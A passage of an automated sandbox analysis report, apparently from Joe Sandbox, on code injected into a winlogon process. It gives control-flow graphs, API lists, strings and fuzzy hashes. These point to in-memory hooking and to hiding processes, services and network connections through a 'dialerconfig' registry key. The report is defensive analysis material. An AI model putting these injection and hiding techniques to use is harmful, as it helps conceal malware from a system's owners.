28079->28080 28081 1f6c88d29b8 28079->28081 28080->28081

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                      • API String ID: 106492572-2879589442
                                                                                                      • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                      • Instruction ID: 0be5d788d08d666f523fe049a0fa1f0b9abf75461dfb494b1042db7d0f30801f
                                                                                                      • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                                                                                      • Instruction Fuzzy Hash: 8871D73A612A5685EB30DF75EC906F927A4FB88BA8F405131DACE57EA8DF38C445C700

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 51 1f6c88a5c10-1f6c88a5c37 52 1f6c88a5c39-1f6c88a5c48 51->52 53 1f6c88a5c4b-1f6c88a5c56 GetCurrentThreadId 51->53 52->53 54 1f6c88a5c62-1f6c88a5c69 53->54 55 1f6c88a5c58-1f6c88a5c5d 53->55 57 1f6c88a5c7b-1f6c88a5c8f 54->57 58 1f6c88a5c6b-1f6c88a5c76 call 1f6c88a5a40 54->58 56 1f6c88a608f-1f6c88a60a6 call 1f6c88a7a20 55->56 60 1f6c88a5c9e-1f6c88a5ca4 57->60 58->56 64 1f6c88a5d75-1f6c88a5d96 60->64 65 1f6c88a5caa-1f6c88a5cb3 60->65 69 1f6c88a5eff-1f6c88a5f10 call 1f6c88a759f 64->69 70 1f6c88a5d9c-1f6c88a5dbc GetThreadContext 64->70 67 1f6c88a5cb5-1f6c88a5cf8 call 1f6c88a86a0 65->67 68 1f6c88a5cfa-1f6c88a5d6d call 1f6c88a45f0 call 1f6c88a4590 call 1f6c88a4550 65->68 80 1f6c88a5d70 67->80 68->80 84 1f6c88a5f15-1f6c88a5f1b 69->84 73 1f6c88a5dc2-1f6c88a5de3 70->73 74 1f6c88a5efa 70->74 73->74 83 1f6c88a5de9-1f6c88a5df2 73->83 74->69 80->60 86 1f6c88a5df4-1f6c88a5e05 83->86 87 1f6c88a5e72-1f6c88a5e83 83->87 88 1f6c88a5f21-1f6c88a5f78 VirtualProtect FlushInstructionCache 84->88 89 1f6c88a5fde-1f6c88a5fee 84->89 93 1f6c88a5e07-1f6c88a5e1c 86->93 94 1f6c88a5e6d 86->94 97 1f6c88a5ef5 87->97 98 1f6c88a5e85-1f6c88a5ea3 87->98 95 1f6c88a5fa9-1f6c88a5fd9 call 1f6c88a798c 88->95 96 1f6c88a5f7a-1f6c88a5f84 88->96 91 1f6c88a5ff0-1f6c88a5ff7 89->91 92 1f6c88a5ffe-1f6c88a600a call 1f6c88a4ed0 89->92 91->92 100 1f6c88a5ff9 call 1f6c88a44c0 91->100 113 1f6c88a600f-1f6c88a6015 92->113 93->94 102 1f6c88a5e1e-1f6c88a5e68 call 1f6c88a3a50 SetThreadContext 93->102 94->97 95->84 96->95 103 1f6c88a5f86-1f6c88a5fa1 call 1f6c88a4470 96->103 98->97 104 1f6c88a5ea5-1f6c88a5ef0 call 1f6c88a39e0 call 1f6c88a75bd 98->104 100->92 102->94 103->95 104->97 117 1f6c88a6057-1f6c88a6075 113->117 118 1f6c88a6017-1f6c88a6055 ResumeThread call 1f6c88a798c 113->118 120 1f6c88a6089 117->120 121 1f6c88a6077-1f6c88a6086 117->121 118->113 120->56 121->120
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Thread$Current$Context
                                                                                                      • String ID:
                                                                                                      • API String ID: 1666949209-0
                                                                                                      • Opcode ID: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
                                                                                                      • Instruction ID: 14cad05894704a557f22f57f10d3937e7657795b75d7a9cdddc647a2c4b7120a
                                                                                                      • Opcode Fuzzy Hash: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
                                                                                                      • Instruction Fuzzy Hash: 81D1CF36209B8985DA70DB69E4943AA77A0F3C8B94F100126EACD47FE9DF3DC591CB00

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 1092925422-0
                                                                                                      • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                      • Instruction ID: ba7ebadacc451a9166115248146817fcb64143ccf44df5bd30920213339611b7
                                                                                                      • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                      • Instruction Fuzzy Hash: 56110C3A706B4282EB24DB61F4142F9A6A4FB89BA4F044039DFC947B94EF3DC945C704

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 129 1f6c88a51b0-1f6c88a51dc 130 1f6c88a51de-1f6c88a51e6 129->130 131 1f6c88a51ed-1f6c88a51f6 129->131 130->131 132 1f6c88a51f8-1f6c88a5200 131->132 133 1f6c88a5207-1f6c88a5210 131->133 132->133 134 1f6c88a5221-1f6c88a522a 133->134 135 1f6c88a5212-1f6c88a521a 133->135 136 1f6c88a5236-1f6c88a5241 GetCurrentThreadId 134->136 137 1f6c88a522c-1f6c88a5231 134->137 135->134 139 1f6c88a5243-1f6c88a5248 136->139 140 1f6c88a524d-1f6c88a5254 136->140 138 1f6c88a57b3-1f6c88a57ba 137->138 139->138 141 1f6c88a5261-1f6c88a526a 140->141 142 1f6c88a5256-1f6c88a525c 140->142 143 1f6c88a5276-1f6c88a5282 141->143 144 1f6c88a526c-1f6c88a5271 141->144 142->138 145 1f6c88a52ae-1f6c88a5305 call 1f6c88a57c0 * 2 143->145 146 1f6c88a5284-1f6c88a52a9 143->146 144->138 151 1f6c88a5307-1f6c88a530e 145->151 152 1f6c88a531a-1f6c88a5323 145->152 146->138 153 1f6c88a5310 151->153 154 1f6c88a5316 151->154 155 1f6c88a5335-1f6c88a533e 152->155 156 1f6c88a5325-1f6c88a5332 152->156 157 1f6c88a5390-1f6c88a5396 153->157 158 1f6c88a5386-1f6c88a538a 154->158 159 1f6c88a5340-1f6c88a5350 155->159 160 1f6c88a5353-1f6c88a5378 call 1f6c88a7950 155->160 156->155 162 1f6c88a53c5-1f6c88a53cb 157->162 163 1f6c88a5398-1f6c88a53b4 call 1f6c88a4470 157->163 158->157 159->160 168 1f6c88a537e 160->168 169 1f6c88a540d-1f6c88a5422 call 1f6c88a3da0 160->169 166 1f6c88a53f5-1f6c88a5408 162->166 167 1f6c88a53cd-1f6c88a53ec call 1f6c88a798c 162->167 163->162 172 1f6c88a53b6-1f6c88a53be 163->172 166->138 167->166 168->158 176 1f6c88a5431-1f6c88a543a 169->176 177 1f6c88a5424-1f6c88a542c 169->177 172->162 178 1f6c88a544c-1f6c88a549a call 1f6c88a8d50 176->178 179 1f6c88a543c-1f6c88a5449 176->179 177->158 182 1f6c88a54a2-1f6c88a54aa 178->182 179->178 183 1f6c88a54b0-1f6c88a559b call 1f6c88a7520 182->183 184 1f6c88a55b7-1f6c88a55bf 182->184 196 1f6c88a559f-1f6c88a55ae call 1f6c88a4140 183->196 197 1f6c88a559d 183->197 185 1f6c88a55c1-1f6c88a55d4 call 1f6c88a4670 184->185 186 1f6c88a5603-1f6c88a560b 184->186 198 1f6c88a55d8-1f6c88a5601 185->198 199 1f6c88a55d6 185->199 189 1f6c88a5617-1f6c88a5626 186->189 190 1f6c88a560d-1f6c88a5615 186->190 194 1f6c88a562f 189->194 195 1f6c88a5628 189->195 190->189 193 1f6c88a5634-1f6c88a5641 190->193 201 1f6c88a5644-1f6c88a5699 call 1f6c88a86a0 193->201 202 1f6c88a5643 193->202 194->193 195->194 206 1f6c88a55b0 196->206 207 1f6c88a55b2 196->207 197->184 198->184 199->186 208 1f6c88a56a8-1f6c88a5741 call 1f6c88a45f0 call 1f6c88a4550 VirtualProtect 201->208 209 1f6c88a569b-1f6c88a56a3 201->209 202->201 206->184 207->182 214 1f6c88a5751-1f6c88a57b1 208->214 215 1f6c88a5743-1f6c88a5748 GetLastError 208->215 214->138 215->214
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2882836952-0
                                                                                                      • Opcode ID: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
                                                                                                      • Instruction ID: 23a021ac7fb55512e573982c7af5fb28fc16e9236576432e410f2a5d543e5080
                                                                                                      • Opcode Fuzzy Hash: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
                                                                                                      • Instruction Fuzzy Hash: B302AA3611AB8186EB60CB65E4943AAB7A0F3C5794F105125EACE87FE9DF7DC484CB00

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocQuery
                                                                                                      • String ID:
                                                                                                      • API String ID: 31662377-0
                                                                                                      • Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                                                                      • Instruction ID: 14604c29ca66876195e9b4b748057f6833472e9913c4133fece4cd02cac232be
                                                                                                      • Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                                                                                      • Instruction Fuzzy Hash: EE31EC3261AA8682EB70DA35E4543EAA2A5F3887A4F500535F6CD47FE9DF7DC5818B00

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                      • String ID:
                                                                                                      • API String ID: 1683269324-0
                                                                                                      • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                      • Instruction ID: a6bda54fd4cde59eb3defc92972b87cc2a728c7c335a6204337d58bbc06204bf
                                                                                                      • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                                                                                      • Instruction Fuzzy Hash: FE11577062760382FB71E771A8063F92290EBA4B24F5400399BC687DD4EF79C4888350

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3733156554-0
                                                                                                      • Opcode ID: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
                                                                                                      • Instruction ID: 4cd72e48f6a02dd57c329797b3560a18a91101cda2c11f91feb9cb50431cceb9
                                                                                                      • Opcode Fuzzy Hash: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
                                                                                                      • Instruction Fuzzy Hash: AAF0B73621AA4581DA30EB25E4517EAA7A0E3C87F4F141125FACD07FE9DE39C2908B00

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 263 1f6c8472908-1f6c8472973 call 1f6c8470f34 * 4 272 1f6c8472b8b 263->272 273 1f6c8472979-1f6c847297c 263->273 275 1f6c8472b8d-1f6c8472ba9 272->275 273->272 274 1f6c8472982-1f6c8472985 273->274 274->272 276 1f6c847298b-1f6c847298e 274->276 276->272 277 1f6c8472994-1f6c84729b2 VirtualAlloc 276->277 277->272 278 1f6c84729b8-1f6c84729dc call 1f6c8470d6c 277->278 281 1f6c8472a0b-1f6c8472a12 278->281 282 1f6c84729de-1f6c8472a09 call 1f6c8470d6c 278->282 284 1f6c8472a18-1f6c8472a25 281->284 285 1f6c8472ab2-1f6c8472ab9 281->285 282->281 284->285 289 1f6c8472a2b-1f6c8472a39 LoadLibraryA 284->289 286 1f6c8472b6c-1f6c8472b89 285->286 287 1f6c8472abf-1f6c8472ad6 285->287 286->275 287->286 290 1f6c8472adc 287->290 291 1f6c8472a9d-1f6c8472aa5 289->291 292 1f6c8472a3b-1f6c8472a45 289->292 295 1f6c8472ae2-1f6c8472af7 290->295 291->289 293 1f6c8472aa7-1f6c8472aac 291->293 296 1f6c8472a48-1f6c8472a4c 292->296 293->285 299 1f6c8472b5b-1f6c8472b66 295->299 300 1f6c8472af9-1f6c8472b0a 295->300 297 1f6c8472a9a 296->297 298 1f6c8472a4e-1f6c8472a52 296->298 297->291 301 1f6c8472a7d-1f6c8472a87 298->301 302 1f6c8472a54-1f6c8472a7b 298->302 299->286 299->295 304 1f6c8472b0c-1f6c8472b13 300->304 305 1f6c8472b15-1f6c8472b19 300->305 306 1f6c8472a8d-1f6c8472a98 301->306 302->306 307 1f6c8472b48-1f6c8472b59 304->307 308 1f6c8472b1b-1f6c8472b22 305->308 309 1f6c8472b24-1f6c8472b28 305->309 306->296 307->299 307->300 308->307 310 1f6c8472b3a-1f6c8472b3e 309->310 311 1f6c8472b2a-1f6c8472b38 309->311 310->307 312 1f6c8472b40-1f6c8472b43 310->312 311->307 312->307
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12785446873.000001F6C8470000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8470000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8470000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocLibraryLoadVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3550616410-0
                                                                                                      • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction ID: 7968349ee8d14acd218f03b9e52b4c43487f15eec3f3bf0d1e51d22d55287b6f
                                                                                                      • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction Fuzzy Hash: 3661BD7270166287EA78CF2A94807B9B391FB54BA4F54C139DBDA07785DF38E852C700

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                        • Part of subcall function 000001F6C88A1650: GetProcessHeap.KERNEL32 ref: 000001F6C88A165B
                                                                                                        • Part of subcall function 000001F6C88A1650: HeapAlloc.KERNEL32 ref: 000001F6C88A166A
                                                                                                        • Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A16DA
                                                                                                        • Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A1707
                                                                                                        • Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A1721
                                                                                                        • Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A1741
                                                                                                        • Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A175C
                                                                                                        • Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A177C
                                                                                                        • Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A1797
                                                                                                        • Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A17B7
                                                                                                        • Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A17D2
                                                                                                        • Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A17F2
                                                                                                      • Sleep.KERNEL32 ref: 000001F6C88A1C43
                                                                                                      • SleepEx.KERNELBASE ref: 000001F6C88A1C49
                                                                                                        • Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A180D
                                                                                                        • Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A182D
                                                                                                        • Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A1848
                                                                                                        • Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A1868
                                                                                                        • Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A1883
                                                                                                        • Part of subcall function 000001F6C88A1650: RegOpenKeyExW.ADVAPI32 ref: 000001F6C88A18A3
                                                                                                        • Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A18BE
                                                                                                        • Part of subcall function 000001F6C88A1650: RegCloseKey.ADVAPI32 ref: 000001F6C88A18C8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1534210851-0
                                                                                                      • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                      • Instruction ID: 11655bc69b073d59b314373f83a9bea2d0dfd2b522bb48740e46c9768987d993
                                                                                                      • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                                                                                      • Instruction Fuzzy Hash: 8D31787D212A0391FB74DB36DA513FA52A5AB84BE5F145031DECB87ED7EE28C8608250

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 352 1f6c88a3930-1f6c88a393b 353 1f6c88a3955-1f6c88a395c 352->353 354 1f6c88a393d-1f6c88a3950 StrCmpNIW 352->354 354->353 355 1f6c88a3952 354->355 355->353
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: dialer
                                                                                                      • API String ID: 0-3528709123
                                                                                                      • Opcode ID: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                                      • Instruction ID: 07dc30d4aa9ba2fd93085fbae647fe776ec9f6c05cca99c520f775f8bde79021
                                                                                                      • Opcode Fuzzy Hash: 949ed436222ef7ba0644b0ca804308ca47b9c81469ce6be8bad6d29646da7b56
                                                                                                      • Instruction Fuzzy Hash: B3D0173031220B86FB34DBB188912F02250EB45724F489030CA8102994D7198D8D8710

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 356 1f6c88d2908-1f6c88d2973 call 1f6c88d0f34 * 4 365 1f6c88d2b8b 356->365 366 1f6c88d2979-1f6c88d297c 356->366 368 1f6c88d2b8d-1f6c88d2ba9 365->368 366->365 367 1f6c88d2982-1f6c88d2985 366->367 367->365 369 1f6c88d298b-1f6c88d298e 367->369 369->365 370 1f6c88d2994-1f6c88d29b2 VirtualAlloc 369->370 370->365 371 1f6c88d29b8-1f6c88d29dc call 1f6c88d0d6c 370->371 374 1f6c88d29de-1f6c88d2a09 call 1f6c88d0d6c 371->374 375 1f6c88d2a0b-1f6c88d2a12 371->375 374->375 377 1f6c88d2ab2-1f6c88d2ab9 375->377 378 1f6c88d2a18-1f6c88d2a25 375->378 380 1f6c88d2abf-1f6c88d2ad6 377->380 381 1f6c88d2b6c-1f6c88d2b89 377->381 378->377 382 1f6c88d2a2b-1f6c88d2a39 378->382 380->381 383 1f6c88d2adc 380->383 381->368 389 1f6c88d2a3b-1f6c88d2a45 382->389 390 1f6c88d2a9d-1f6c88d2aa5 382->390 385 1f6c88d2ae2-1f6c88d2af7 383->385 387 1f6c88d2b5b-1f6c88d2b66 385->387 388 1f6c88d2af9-1f6c88d2b0a 385->388 387->381 387->385 393 1f6c88d2b15-1f6c88d2b19 388->393 394 1f6c88d2b0c-1f6c88d2b13 388->394 395 1f6c88d2a48-1f6c88d2a4c 389->395 390->382 391 1f6c88d2aa7-1f6c88d2aac 390->391 391->377 399 1f6c88d2b24-1f6c88d2b28 393->399 400 1f6c88d2b1b-1f6c88d2b22 393->400 398 1f6c88d2b48-1f6c88d2b59 394->398 396 1f6c88d2a4e-1f6c88d2a52 395->396 397 1f6c88d2a9a 395->397 401 1f6c88d2a54-1f6c88d2a7b 396->401 402 1f6c88d2a7d-1f6c88d2a87 396->402 397->390 398->387 398->388 403 1f6c88d2b3a-1f6c88d2b3e 399->403 404 1f6c88d2b2a-1f6c88d2b38 399->404 400->398 405 1f6c88d2a8d-1f6c88d2a98 401->405 402->405 403->398 406 1f6c88d2b40-1f6c88d2b43 403->406 404->398 405->395 406->398
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12790483365.000001F6C88D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F6C88D0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88d0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction ID: c1738a26b98df9f30bfd0c631a3a9452fa9da9fa5f15d235e032fcd5a5cfc14b
                                                                                                      • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                                                                                      • Instruction Fuzzy Hash: 6661AA7270265387EA78DF2995407BDB391FB44BA4F54812BDED907B85DB38E852C700

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 4292702814-0
                                                                                                      • Opcode ID: 7fe340314b3ee63b25ee94e81b3b385efda0c5a0b61db0164e6d51f794c8e3ff
                                                                                                      • Instruction ID: 51b7856f3508d0c3cb27926d78de88f56f6e6cb6d64577db43eb5a80a250bb7b
                                                                                                      • Opcode Fuzzy Hash: 7fe340314b3ee63b25ee94e81b3b385efda0c5a0b61db0164e6d51f794c8e3ff
                                                                                                      • Instruction Fuzzy Hash: 5EF0153170528B49FA74EBBA69053FDA1C05B8CBB2F084A316DEA866C3DB2CC4519290
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                      • API String ID: 2119608203-3850299575
                                                                                                      • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction ID: 61a6284086d29bc91aece22bca5f142c4ebadfb8cabddd7c3e08e2c8f08fe71a
                                                                                                      • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction Fuzzy Hash: 65B17D72211A9281EB75CF79D4407F9A3A4FB48BA6F54503AEECA53796DB35CC80C340
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                      • API String ID: 2119608203-3850299575
                                                                                                      • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction ID: 042ae2964a89d9f9d2caf1ab4c60366dd6a67adbe8110dc3c7066958067e7d98
                                                                                                      • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                                                                                      • Instruction Fuzzy Hash: 91B15A72222A5286EB78CF75D4507F9A3A4FB84BA4F54502AEEC953FD9DB35C880C340
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3140674995-0
                                                                                                      • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                      • Instruction ID: cb427cba997a5a879f1a84418dee62e2220008056d564a7eee05c2057aff6548
                                                                                                      • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                      • Instruction Fuzzy Hash: C7313A72205A8196EB70DF74E8403ED77A4F789765F44442ADACE47B99EF38C548C710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 3140674995-0
                                                                                                      • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                      • Instruction ID: db6530e822c96f4d7b1cc044adcff89caac3089801e185ecd677b203a675d724
                                                                                                      • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                                                                                      • Instruction Fuzzy Hash: 62311972206A8296EB70DF70E8407FE63A4F785754F44442ADBCD57A99EF38C648C710
                                                                                                      APIs
